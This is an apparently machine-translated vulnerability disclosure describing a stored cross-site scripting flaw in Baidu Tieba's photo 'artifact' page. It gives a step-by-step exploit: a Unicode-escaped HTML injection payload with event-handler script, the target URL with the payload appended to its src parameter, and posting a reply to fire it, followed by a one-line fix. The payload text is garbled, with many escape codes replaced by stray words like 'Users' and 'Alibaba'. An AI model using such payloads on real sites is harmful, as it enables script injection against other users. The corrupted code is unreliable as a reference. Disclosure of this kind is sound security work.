An XSS vulnerability exists in the upload of texture artifacts. 1. Construct the code first: "> <a 2. then perform transcoding: \ Users \ u003e \ u003c \ u0069 \ u006d \ u0067 \ u0020 \ u0063 \ Users \ u0061 \ u0073 \ u0073 \ u003d \ u0022 \ u0042 \ u0044 \ u0045 \ Users \ \ Users \ u0065 \ u0079 \ u0022 \ u0020 \ u0073 \ u0072 \ u0063 \ u003d \ u0022 \ u0068 \ u0074 \ u0074 \ u0070 \ u003a \ u002f \ Users \ \ Users \ u0074 \ u0069 \ u0063 \ Users \ u0074 \ u0069 \ u0065 \ u0062 \ u0061 \ Users \ u0062 \ u0061 \ u0069 \ u0064 \ u0075 \ Users \ u0063 \ Users \ \ Users \ u0074 \ u0062 \ u002f \ u0065 \ u0064 \ u0069 \ u0074 \ Users \ u0072 \ u002f \ u0069 \ u006d \ u0061 \ u0067 \ u0065 \ u0073 \ Users \ \ Users \ u0065 \ u002f \ u0069 \ Users \ u0066 \ u0030 \ u0031 \ Users \ u0070 \ Users \ u0067 \ u0022 \ u0020 \ u0070 \ u0069 \ u0063 \ Users \ u0065 \ u0078 \ Users \ u003d \ u0022 \ u0070 \ Users \ u0067 \ u0022 \ u0020 \ u0077 \ u0069 \ u0064 \ u0074 \ u0068 \ u003d \ u0022 \ u0033 \ u0030 \ Users \ \ Users \ u0069 \ u0067 \ u0068 \ u0074 \ u003d \ u0022 \ u0033 \ u0030 \ u0022 \ u0020 \ Users \ u0061 \ u0064 \ u003d \ u0022 \ u0061 \ Users \ u0065 \ u0072 \ u0074 \ u0028 \ u0031 \ u0029 \ u0022 \ u003e \ u003c \ u0069 \ u006d \ u0067 \ u0020 \ u0073 \ u0072 \ Users \ Users \ u0020 \ u0070 \ u0069 \ u0063 \ Users \ u0065 \ u0078 \ u0074 \ u003d \ u0022 \ u006a \ u0070 \ u0065 \ u0067 \ u0022 \ u0020 \ Users \ \ Users \ u0072 \ Users \ u0072 \ u003d \ u0022 \ u0024 \ u0028 \ u0026 \ u0071 \ u0075 \ Users \ u0074 \ u003b \ Users \ u0070 \ u0069 \ u0063 \ Users \ u0073 \ Users \ u0063 \ Users \ u0077 \ u0072 \ u0061 \ u0070 \ u0070 \ u0065 \ u0072 \ u0026 \ u0071 \ u0075 \ Users \ u0074 \ u003b \ u0029 \ Users \ u0063 \ \ Users \ u0028 \ u0026 \ u0071 \ u0075 \ Users \ u0074 \ u003b \ u0064 \ u0069 \ u0073 \ u0070 \ Users \ u0061 \ u0079 \ u0026 \ u0071 \ u0075 \ Users \ \ u003b \ u002c \ u0026 \ u0071 \ u0075 \ Alibaba \ u0074 \ u003b \ Alibaba \ u0065 \ u0026 \ u0071 \ u0075 \ Alibaba \ u0074 \ u003b \ u0029 \ \ u003e \ u003c \ u0061 3. http://tieba.baidu.com/photo/shenqi?title=&src=http%3A%2F%2Fwww.baidu.com%2Fp%2F%25E5%258D%2596%25E8%2590%258C%25E7%259A%2584%25E4%25B8%25AD%25E4%25BA%258C%3Ffrom%3Dsuper Paste (this is the post bar artifact address) 4. Put the constructed code behind the & src = connection 5. Get http://tieba.baidu.com/photo/shenqi?title=&src=http%3A%2F%2Fwww.baidu.com%2Fp%2F%25E5%258D%2596%25E8%2590%258C%25E7%259A%2584%25E4%25B8%25AD%25E4%25BA%258C%3Ffrom%3Dsuper \ Users \ u003e \ u003c \ u0069 \ u006d \ u0067 \ u0020 \ u0063 \ Users \ u0061 \ u0073 \ u0073 \ u003d \ u0022 \ u0042 \ u0044 \ u0045 \ Users \ \ Users \ u0065 \ u0079 \ u0022 \ u0020 \ u0073 \ u0072 \ u0063 \ u003d \ u0022 \ u0068 \ u0074 \ u0074 \ u0070 \ u003a \ u002f \ Users \ \ Users \ u0074 \ u0069 \ u0063 \ Users \ u0074 \ u0069 \ u0065 \ u0062 \ u0061 \ Users \ u0062 \ u0061 \ u0069 \ u0064 \ u0075 \ Users \ u0063 \ Users \ \ Users \ u0074 \ u0062 \ u002f \ u0065 \ u0064 \ u0069 \ u0074 \ Users \ u0072 \ u002f \ u0069 \ u006d \ u0061 \ u0067 \ u0065 \ u0073 \ Users \ \ Users \ u0065 \ u002f \ u0069 \ Users \ u0066 \ u0030 \ u0031 \ Users \ u0070 \ Users \ u0067 \ u0022 \ u0020 \ u0070 \ u0069 \ u0063 \ Users \ u0065 \ u0078 \ Users \ u003d \ u0022 \ u0070 \ Users \ u0067 \ u0022 \ u0020 \ u0077 \ u0069 \ u0064 \ u0074 \ u0068 \ u003d \ u0022 \ u0033 \ u0030 \ Users \ \ Users \ u0069 \ u0067 \ u0068 \ u0074 \ u003d \ u0022 \ u0033 \ u0030 \ u0022 \ u0020 \ Users \ u0061 \ u0064 \ u003d \ u0022 \ u0061 \ Users \ u0065 \ u0072 \ u0074 \ u0028 \ u0031 \ u0029 \ u0022 \ u003e \ u003c \ u0069 \ u006d \ u0067 \ u0020 \ u0073 \ u0072 \ Users \ Users \ u0020 \ u0070 \ u0069 \ u0063 \ Users \ u0065 \ u0078 \ u0074 \ u003d \ u0022 \ u006a \ u0070 \ u0065 \ u0067 \ u0022 \ u0020 \ Users \ \ Users \ u0072 \ Users \ u0072 \ u003d \ u0022 \ u0024 \ u0028 \ u0026 \ u0071 \ u0075 \ Users \ u0074 \ u003b \ Users \ u0070 \ u0069 \ u0063 \ Users \ u0073 \ Users \ u0063 \ Users \ u0077 \ u0072 \ u0061 \ u0070 \ u0070 \ u0065 \ u0072 \ u0026 \ u0071 \ u0075 \ Users \ u0074 \ u003b \ u0029 \ Users \ u0063 \ \ Users \ u0028 \ u0026 \ u0071 \ u0075 \ Users \ u0074 \ u003b \ u0064 \ u0069 \ u0073 \ u0070 \ Users \ u0061 \ u0079 \ u0026 \ u0071 \ u0075 \ Users \ \ u003b \ u002c \ u0026 \ u0071 \ u0075 \ Alibaba \ u0074 \ u003b \ Alibaba \ u0065 \ u0026 \ u0071 \ u0075 \ Alibaba \ u0074 \ u003b \ u0029 \ \ u003e \ u003c \ u0061 limit 6. then, reply to or publish a topic to generate an XSS
Solution:Filter symbol "\"